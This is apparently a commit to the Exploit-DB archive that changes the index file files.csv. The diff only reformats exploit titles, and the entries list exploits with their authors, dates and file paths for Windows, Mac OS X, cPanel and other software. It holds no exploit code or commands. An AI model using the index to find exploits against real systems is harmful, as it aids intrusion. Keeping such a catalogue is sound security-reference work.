DB: 2017-04-07

7 new exploits Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service Microsoft Windows - explorer.exe Gif Image Denial of Service Microsoft Windows Explorer - '.GIF' Image Denial of Service Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC) Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC) Microsoft Windows - Explorer Unspecified .doc File Denial of Service Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit Microsoft Windows - GDI+ '.ICO' Remote Division By Zero Exploit DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC) DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC) IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1) Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2) Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1) Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2) Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2) Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (1) Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (2) Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (3) Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (4) Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1) Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2) Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3) Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4) Microsoft Windows XP/95/98/2000/NT 4 - 'Riched20.dll' Attribute Buffer Overflow Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115) Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115) Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow Cesanta Mongoose OS - Use-After-Free CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC) GLIBC (via /bin/su) - Privilege Escalation GLIBC - '/bin/su' Privilege Escalation cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit) Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit) Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit) Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit) Microsoft Windows NT 4/2000 - DLL Search Path Microsoft Windows NT 4.0/2000 - DLL Search Path Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003) Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003) Microsoft Windows NT 3/4 - CSRSS Memory Access Violation Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation Microsoft Windows NT 4/2000 - NTFS File Hiding Microsoft Windows NT 4.0/2000 - NTFS File Hiding Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7) Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2) Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1) Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2) Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation Palo Alto Networks PanOS root_reboot - Privilege Escalation Palo Alto Networks PanOS - root_reboot Privilege Escalation Oracle 9i / 10g - File System Access via utl_file Exploit Oracle 9i / 10g - 'utl_file' File System Access Exploit KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting) QuickPHP Web Server Arbitrary - 'src .php' File Download QuickPHP Web Server - Arbitrary '.php' File Download Microsoft Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081) Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081) Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect Microsoft Windows NT 4/2000 - NetBIOS Name Conflict Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs Microsoft Windows 95/98/2000/NT4 - WinHlp Item Buffer Overflow Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow Microsoft Windows XP/2000/NT 4 - Locator Service Buffer Overflow Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (1) Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (2) Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (3) Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (4) Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1) Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2) Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (3) Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (4) Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow Cerulean Studios Trillian 3.0 - Remote .png Image File Parsing Buffer Overflow Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload Windows 10 x64 - Egghunter Shellcode (45 bytes) eFiction 2.0 - 'Fake .gif' Arbitrary File Upload eFiction 2.0 - Fake '.GIF' Arbitrary File Upload cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP) cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP) Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE) The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit) The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit) elFinder 2 - Remote Command Execution (Via File Creation) elFinder 2 - Remote Command Execution (via File Creation) Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution GeoMoose < 2.9.2 - Directory Traversal Moodle 2.x/3.x - SQL Injection HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution
2017-04-07 05:01:20 +00:00 · 2017-04-07 05:01:20 +00:00 · 7018b7742d
commit 7018b7742d
parent eed6486b7b
8 changed files with 851 additions and 85 deletions
--- a/files.csv
+++ b/files.csv
@ -467,7 +467,7 @@ id,file,description,date,author,platform,type,port
 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0
 3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0
 3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0
-3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0
+3111,platforms/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0
 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0
 3119,platforms/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (1)",2007-01-12,shinnai,windows,dos,0
 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port
 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0
 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0
 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0
-3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
+3190,platforms/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0
 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0
@ -540,7 +540,7 @@ id,file,description,date,author,platform,type,port
 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0
 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash",2007-03-29,shinnai,multiple,dos,0
 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0
-3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service",2007-04-08,Marsu,windows,dos,0
+3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0
 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0
 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0
@ -612,7 +612,7 @@ id,file,description,date,author,platform,type,port
 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service",2007-07-14,shinnai,multiple,dos,0
 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0
-4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0
+4215,platforms/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0
 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0
 4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0
@ -659,7 +659,7 @@ id,file,description,date,author,platform,type,port
 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0
 4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0
 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0
-4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
+4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0
 4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
 5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0
 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0
 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0
-5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0
+5327,platforms/windows/dos/5327.txt,"Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
@ -804,7 +804,7 @@ id,file,description,date,author,platform,type,port
 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
 6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
-6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffiÃ©",windows,dos,0
+6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ICO' Remote Division By Zero Exploit",2008-09-26,"laurent gaffiÃ©",windows,dos,0
 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0
 6615,platforms/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
@ -870,7 +870,7 @@ id,file,description,date,author,platform,type,port
 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0
 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0
 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0
-7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0
+7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0
 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,windows,dos,0
 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 - show_error() Remote Format String (PoC)",2008-12-09,"Core Security",windows,dos,0
 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0
@ -2218,7 +2218,7 @@ id,file,description,date,author,platform,type,port
 18958,platforms/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflows",2012-05-31,"High-Tech Bridge SA",windows,dos,0
 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0
 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0
-18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
+18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0
 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0
 19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit",1991-05-01,anonymous,aix,dos,0
@ -2360,7 +2360,7 @@ id,file,description,date,author,platform,type,port
 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0
 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0
-19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
+19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0
 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0
@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port
 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0
 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,multiple,dos,0
 20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",windows,dos,0
-20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0
+20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0
 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0
 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0
 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos,0
@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0
 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0
-21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
+21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0
 21131,platforms/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0
@ -2601,8 +2601,8 @@ id,file,description,date,author,platform,type,port
 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0
 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0
 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0
-21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
+21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
-21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
+21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
